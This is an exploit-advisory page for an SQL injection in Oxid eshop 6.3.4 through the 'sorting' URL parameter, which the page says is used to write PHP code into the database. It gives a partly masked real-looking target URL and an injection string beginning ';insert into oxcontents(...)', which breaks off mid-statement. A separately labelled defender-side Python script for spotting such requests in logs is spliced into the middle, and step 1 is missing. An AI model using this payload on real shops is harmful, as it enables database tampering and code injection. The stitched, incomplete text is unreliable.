Exploits / Vulnerability Discovered : 2020-05-27
Type : webapps
Platform : php
This exploit / vulnerability, Oxid eshop 6.3.4 sorting SQL injection, is for educational purposes only; if you use it, you do so at your own risk!
```bash
e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html
```
2. Add the `sorting` parameter to the URL of the item detail page (insert PHP code
into the database via SQL injection)
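A defender-side check for this step, as an added example that is not part of the original advisory: it flags requests whose `sorting` value is anything other than a bare column name with an optional `asc`/`desc` direction. The `column|direction` shape is an assumption read from the `oxtitle|` prefix of the request in this step; the host, paths and function names are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: a legitimate value is "<column>" or "<column>|<asc or desc>".
COLUMN_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")
DIRECTIONS = {"asc", "desc"}

def sorting_values(url):
    """Decoded `sorting` values; split on '&' only so ';' stays in the value."""
    values = []
    for pair in urlsplit(url).query.split("&"):
        name, _, raw = pair.partition("=")
        if unquote_plus(name) == "sorting":
            values.append(unquote_plus(raw))
    return values

def check_sorting(value):
    """Return the reasons a value is not a plain sort specification."""
    reasons = []
    column, sep, direction = value.partition("|")
    if not COLUMN_RE.fullmatch(column):
        reasons.append("column is not a bare identifier")
    if sep and direction.lower() not in DIRECTIONS:
        reasons.append("direction is not asc/desc")
    if ";" in value:
        reasons.append("statement separator in value")
    return reasons

def flag_requests(urls):
    """Return (url, reasons) for every request whose sorting value fails."""
    hits = []
    for url in urls:
        for value in sorting_values(url):
            reasons = check_sorting(value)
            if reasons:
                hits.append((url, reasons))
    return hits

# Constructed sample requests (host and paths are placeholders).
SAMPLE_URLS = [
    "http://shop.example.test/en/Kites/Kite.html?sorting=oxtitle|asc",
    "http://shop.example.test/en/Kites/Kite.html?sorting=oxprice%7Cdesc",
    "http://shop.example.test/en/Kites/Kite.html?sorting=oxtitle|;insert%20into%20oxcontents",
    "http://shop.example.test/en/Kites/Kite.html",
]

if __name__ == "__main__":
    for url, reasons in flag_requests(SAMPLE_URLS):
        print(url, "->", "; ".join(reasons))
```

The same allowlist (known column names, `asc`/`desc` only) belongs in the application before the value reaches an `ORDER BY` clause; the log check only tells you whether the parameter has already been probed.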
```bash
e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert
into
oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION)